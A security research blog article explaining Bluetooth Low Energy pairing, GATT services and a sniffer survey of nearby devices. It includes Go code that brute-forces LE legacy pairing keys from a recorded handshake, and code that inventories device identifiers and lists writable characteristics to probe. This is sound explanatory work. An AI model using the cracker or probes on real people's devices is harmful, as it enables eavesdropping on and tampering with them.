Bluetooth Low Energy - Pairing, GATT and More

by Eleanore Young

In our last article about Bluetooth, we looked at how Bluetooth Low Energy devices advertise themselves to their surroundings. We discovered that the advertising data sometimes contains device names, vendor names, and information about services offered by the device. But we also mentioned that a large number of Bluetooth Low Energy devices can be connected to without pairing. In order to explain the significance of this statement, we first have to look at the concept of pairing and at the benefits of connecting to devices.

Pairing

Pairing is the process of establishing a mutual trust relationship between two devices: both sides agree on a key, and that key is later used to encrypt and authenticate the link. Whether a device accepts connections without prior pairing depends on the protocol and on the security requirements the device attaches to its services; as we will see, Bluetooth Low Energy devices very often do. In its best-known form, the Bluetooth pairing process requires the participants to confirm that a displayed number is the same on both devices (the Numeric Comparison model), so that both users consciously approve the pairing before it actually happens. This verification number is nowadays usually a six-digit random number. Some devices instead ask for a fixed passkey such as 0000 or 000000 that the vendor has hard-coded, and many devices use the Just Works model, which involves no user verification at all and therefore offers no protection against a man in the middle.

In the background, both Bluetooth devices perform a cryptographic handshake in order to establish an encrypted communication channel between them. After the pairing process, the content of the communication is not visible to others, with one important caveat: in LE legacy pairing (Bluetooth 4.0 and 4.1) with Just Works or Passkey Entry, the temporary key is either zero or a six-digit number, so anyone who recorded the handshake can brute-force it offline, recompute the session key and decrypt everything that follows, including the long-term key handed over at the end of pairing. Only LE Secure Connections (Bluetooth 4.2 and later), which derives the key with Elliptic Curve Diffie-Hellman, makes a passively recorded handshake useless. For more information about Bluetooth pairing, please refer to the memo on pairing security published by the Bluetooth SIG.

Pairing requires cryptographic algorithms, and the Diffie-Hellman step of LE Secure Connections in particular is computationally expensive by design. The link-layer encryption itself (AES-CCM) is cheap and usually done in hardware, so raw computing power is rarely the real obstacle; it is the implementation effort, the need for a display or keypad, and the user interaction that many vendors of small Bluetooth Low Energy devices choose to avoid. As such, much of the communication between these devices is done in the clear, and connections can often be established without pairing.
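To show concretely why a recorded legacy handshake is enough, here is an added example that is not part of the original article and not the sniffer's code. It implements the confirm value function c1 and the key generation function s1 from Core Spec Vol 3 Part H with Go's standard AES and runs the offline brute force against a constructed capture. The Pairing Request and Response bytes, the addresses and Mrand are the spec's own c1 example values; the Srand, the passkey 123456 and the Mconfirm derived from it are assumptions made for the example, and the type and function names are mine.

```go
package main

import (
	"crypto/aes"
	"encoding/hex"
)

// Capture holds what an eavesdropper sees in the clear during LE legacy pairing. Values are kept
// most-significant-octet-first as in the spec's definitions (on the air they travel reversed).
type Capture struct {
	Preq, Pres   [7]byte  // Pairing Request / Pairing Response PDUs, opcode included
	Iat, Rat     byte     // initiator / responder address type: 0 public, 1 random
	Ia, Ra       [6]byte  // initiator / responder addresses
	Mrand, Srand [16]byte // random values revealed after the confirm exchange
	Mconfirm     [16]byte // initiator's confirm value, c1(TK, Mrand, ...)
}

// e is the Bluetooth "e" primitive: a single AES-128 block encryption.
func e(key, plain [16]byte) [16]byte {
	block, _ := aes.NewCipher(key[:]) // a 16-byte key never fails
	var out [16]byte
	block.Encrypt(out[:], plain[:])
	return out
}

func xor16(a, b [16]byte) [16]byte {
	for i := range a {
		a[i] ^= b[i]
	}
	return a
}

// c1 (Vol 3 Part H, 2.2.3): e(k, e(k, r XOR p1) XOR p2), p1 = pres||preq||rat'||iat', p2 = pad||ia||ra.
func c1(k, r [16]byte, preq, pres [7]byte, iat, rat byte, ia, ra [6]byte) [16]byte {
	var p1, p2 [16]byte
	copy(p1[0:7], pres[:])
	copy(p1[7:14], preq[:])
	p1[14], p1[15] = rat, iat
	copy(p2[4:10], ia[:]) // p2[0:4] stays zero: the 32-bit padding
	copy(p2[10:16], ra[:])
	return e(k, xor16(e(k, xor16(r, p1)), p2))
}

// s1 (2.2.4): e(k, r1' || r2'), with r1' and r2' the least significant 64 bits of r1 and r2.
func s1(k, r1, r2 [16]byte) [16]byte {
	var rr [16]byte
	copy(rr[0:8], r1[8:16])
	copy(rr[8:16], r2[8:16])
	return e(k, rr)
}

// tk builds the temporary key: the passkey as a 128-bit integer, 0 for Just Works.
func tk(passkey uint32) [16]byte {
	var k [16]byte
	k[12], k[13], k[14], k[15] = byte(passkey>>24), byte(passkey>>16), byte(passkey>>8), byte(passkey)
	return k
}

// Recover brute-forces the temporary key against the recorded Mconfirm (one candidate for Just
// Works, at most a million for Passkey Entry) and derives STK = s1(TK, Srand, Mrand), the key
// that encrypts the rest of the pairing, including the long-term key distribution.
func Recover(c Capture) (passkey uint32, stk [16]byte, ok bool) {
	for pk := uint32(0); pk <= 999999; pk++ {
		if c1(tk(pk), c.Mrand, c.Preq, c.Pres, c.Iat, c.Rat, c.Ia, c.Ra) == c.Mconfirm {
			return pk, s1(tk(pk), c.Srand, c.Mrand), true
		}
	}
	return 0, [16]byte{}, false
}

func mustHex(dst []byte, s string) {
	b, err := hex.DecodeString(s)
	if err != nil || len(b) != len(dst) {
		panic("bad hex constant")
	}
	copy(dst, b)
}

// ConstructedCapture is a made-up handshake, not a real sniff: PDUs, addresses and Mrand from the
// spec's c1 example, an arbitrary Srand, and Mconfirm computed with the assumed passkey 123456.
func ConstructedCapture() Capture {
	var c Capture
	mustHex(c.Preq[:], "07071000000101")
	mustHex(c.Pres[:], "05000800000302")
	c.Iat, c.Rat = 1, 0
	c.Ia, c.Ra = [6]byte{0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6}, [6]byte{0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6}
	mustHex(c.Mrand[:], "5783D52156AD6F0E6388274EC6702EE0")
	mustHex(c.Srand[:], "000F0E0D0C0B0A091122334455667788")
	c.Mconfirm = c1(tk(123456), c.Mrand, c.Preq, c.Pres, c.Iat, c.Rat, c.Ia, c.Ra)
	return c
}

// SpecVectorC1 reproduces the c1 example of Vol 3 Part H, 2.2.3 (k = 0, iat' = 1, rat' = 0).
func SpecVectorC1() string {
	c := ConstructedCapture()
	out := c1([16]byte{}, c.Mrand, c.Preq, c.Pres, c.Iat, c.Rat, c.Ia, c.Ra)
	return hex.EncodeToString(out[:])
}
```

Against a real capture, the bytes taken from the sniffer must first be reversed from the over-the-air byte order, and for Just Works the loop is a single iteration with TK = 0. With LE Secure Connections none of this applies: the confirm values are computed over the ECDH public keys, and the shared secret never appears on the air.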

Connecting and GATT

Upon connecting to a target Bluetooth Low Energy device, the target provides access to a number of services structured according to the Generic Attribute Profile (GATT). Each service is identified by a UUID and encapsulates a number of GATT characteristics. Each characteristic in turn is identified by a UUID, carries a set of properties (read, write, notify and so on) and holds a byte array value; on the wire, every service and characteristic is addressed by a 16-bit attribute handle. The Bluetooth SIG has declared many services and characteristics, which use 16-bit UUIDs from the SIG's reserved range, but vendors can also specify their own under a 128-bit UUID of their choosing. Both the Bluetooth SIG and the BlueZ repository document known services and characteristics. As an example, take the Device Information service (UUID 0x180A), as defined by the Bluetooth SIG: its characteristics are Manufacturer Name String, Model Number String, Serial Number String, Hardware Revision String, Firmware Revision String, Software Revision String, System ID, IEEE 11073-20601 Regulatory Certification Data List and PnP ID, all of them optional, and in practice all readable without any pairing as soon as a connection is established.

So, in the concrete example of an iPhone, the Device Information service exposes two of the aforementioned characteristics: Manufacturer Name String and Model Number String. They reveal the manufacturer as Apple Inc. and the device as iPhone8,1, which is Apple's hardware model identifier (an iPhone 6s, in this case) and says nothing about the iOS version. That the service is missing the other characteristics is crucial: vendors may decide not to provide this information even though the service defines it. But they might also decide to provide everything, as is the case for a Zebra Technologies printer, which provides the model identifier ZD410, the full (!) device serial number, the firmware revision V77.19.17Z, the hardware revision ZD41022-D0EM00EZ, the software version 3.2 and a PnP ID. An exact model and firmware build is what an attacker needs to look up known vulnerabilities, and a serial number ties the device to a specific unit and owner, so this information can be an important basis for strategically preparing attacks on these devices. And because many characteristics are writable, it is conceivable that even device behavior can be modified through the GATT hierarchy, again without any pairing.
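As an added example that is neither the article's nor the sniffer's code, the following Go program takes a GATT hierarchy as a sniffer would record it and pulls out what the text describes: it normalizes short UUIDs to the Bluetooth Base UUID form, decodes the Device Information strings and the binary PnP ID, and lists characteristics that advertise write access. The hierarchy is constructed: the model and revision strings are the ones quoted above for the Zebra printer, while the serial number, the PnP ID bytes, the handles and the vendor service UUIDs are invented, and the type and function names are mine.

```go
package main

import (
	"encoding/binary"
	"fmt"
	"strings"
)

// SIG-assigned 16-bit UUIDs (public services and member companies) are shorthand for 0000xxxx plus
// this suffix, the Bluetooth Base UUID; vendor-defined services use their own 128-bit UUID.
const baseUUIDSuffix = "-0000-1000-8000-00805f9b34fb"

// Characteristic property bits (Core Spec Vol 3 Part G, 3.3.1.1).
const PropRead, PropWriteNoRsp, PropWrite, PropNotify byte = 0x02, 0x04, 0x08, 0x10

// Value is what a read returned; nil if the characteristic was never read.
type Characteristic struct{ Handle uint16; UUID string; Props byte; Value []byte }
type Service struct{ UUID string; Chars []Characteristic }

// NormalizeUUID expands "180a" or "0x180A" to the full 128-bit, lower-case form.
func NormalizeUUID(u string) string {
	u = strings.ToLower(strings.TrimPrefix(strings.TrimSpace(u), "0x"))
	if len(u) == 4 {
		return "0000" + u + baseUUIDSuffix
	}
	return u
}

// Device Information service (0x180A) string characteristics, plus the binary PnP ID, by 16-bit UUID.
var disChars = map[string]string{
	"2a29": "Manufacturer Name String", "2a24": "Model Number String", "2a25": "Serial Number String",
	"2a27": "Hardware Revision String", "2a26": "Firmware Revision String", "2a28": "Software Revision String",
	"2a50": "PnP ID",
}

// DecodePnPID renders the 7-byte PnP ID: source (1 = SIG company ID, 2 = USB-IF), then vendor ID,
// product ID and product version, the 16-bit fields little-endian. Any other length is malformed.
func DecodePnPID(v []byte) (string, bool) {
	if len(v) != 7 {
		return "", false
	}
	return fmt.Sprintf("vendor %04x (source %d) product %04x v%04x", binary.LittleEndian.Uint16(v[1:3]),
		v[0], binary.LittleEndian.Uint16(v[3:5]), binary.LittleEndian.Uint16(v[5:7])), true
}

// Identifiers renders every Device Information characteristic the device exposes: the exact
// model, unit and firmware build an attacker wants to know before touching the device.
func Identifiers(svcs []Service) map[string]string {
	out := map[string]string{}
	for _, s := range svcs {
		if NormalizeUUID(s.UUID) != NormalizeUUID("180a") {
			continue
		}
		for _, c := range s.Chars {
			short := NormalizeUUID(c.UUID)[4:8]
			name, known := disChars[short]
			if !known || c.Value == nil {
				continue
			}
			if short == "2a50" {
				if pnp, ok := DecodePnPID(c.Value); ok {
					out[name] = pnp
				}
				continue
			}
			out[name] = string(c.Value) // the rest are UTF-8 strings
		}
	}
	return out
}

// WritableHandles lists characteristics that advertise write support. Properties only say what the
// device offers; whether a write succeeds without pairing is learned by trying it and checking for
// ATT errors 0x05 (Insufficient Authentication) or 0x0F (Insufficient Encryption).
func WritableHandles(svcs []Service) []uint16 {
	var hs []uint16
	for _, s := range svcs {
		for _, c := range s.Chars {
			if c.Props&(PropWrite|PropWriteNoRsp) != 0 {
				hs = append(hs, c.Handle)
			}
		}
	}
	return hs
}

// ConstructedPrinter is a made-up GATT dump shaped like the Zebra printer in the text: model and
// revisions are the values quoted there; serial number, PnP ID, handles and vendor service are invented.
func ConstructedPrinter() []Service {
	return []Service{
		{UUID: "180a", Chars: []Characteristic{
			{0x0003, "2a24", PropRead, []byte("ZD410")},
			{0x0005, "2a25", PropRead, []byte("D2J000000000")},
			{0x0007, "2a26", PropRead, []byte("V77.19.17Z")},
			{0x0009, "2a27", PropRead, []byte("ZD41022-D0EM00EZ")},
			{0x000d, "2a50", PropRead, []byte{0x01, 0x34, 0x12, 0x78, 0x56, 0x02, 0x01}},
		}},
		{UUID: "12345678-1234-5678-1234-56789abcdef0", Chars: []Characteristic{
			{0x0012, "12345678-1234-5678-1234-56789abcdef1", PropRead | PropWrite | PropNotify, nil},
		}},
	}
}
```

Run against a recorded hierarchy, Identifiers gives the inventory the text talks about (model, serial, firmware), and WritableHandles gives the list of handles to probe next; the ATT error code returned by such a probe is what tells you whether the vendor actually protected the characteristic with pairing.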

Analysis with BTLE Sniffer Software

How does this relate to the devices commonly around us? The sniffer presented in the last article about Bluetooth was updated to connect to the discovered devices and now records the GATT hierarchy for each of them. It cannot yet record the values of GATT characteristics, but this will be added in the foreseeable future. Issues and pull requests are welcome!

The sniffer was used to record Bluetooth Low Energy devices in a rather busy area over a period of 15 minutes. Of a sample of 356 discovered devices, 157 had a public device name, and 185 devices offered a total of 31 unique services (12 of them SIG-defined). Many of the Bluetooth Low Energy devices were infrastructure devices of unclear function, only very few were smartphones, and a large proportion were IoT devices, particularly smart watches and fitness trackers.

Devices commonly identified by their names were Fitbit (including the Alta), Garmin and Microsoft smart watches, Bose and Jabra headphones, as well as Estimote iBeacon devices, Apple TV and Apple Pencil. A few devices were ostensibly named after their owners. Devices provided three services on average, and the Device Information service is present on almost all of them. Some particularly salient services were: B&O Play A/S, Heart Rate, Anhui Huami Information Technology Co., Bose Corporation, GoPro, Inc. and Kontakt Micro-Location Sp. z o.o.

With the exception of the Heart Rate service, all of the aforementioned services are vendor-defined. What the specific purposes of these services are remains open to speculation, as there is generally no documentation on vendor-defined services. Given what we were able to gather from the Zebra Technologies printer, it is very likely that at least some of these services provide juicy information or even some form of control over the device.

About the Author

Eleanore Young

Eleanore Young completed her master's degree in electrical engineering and information technology at ETH Zurich in 2014. Her areas of focus include computer architectures, operating systems and applied research.
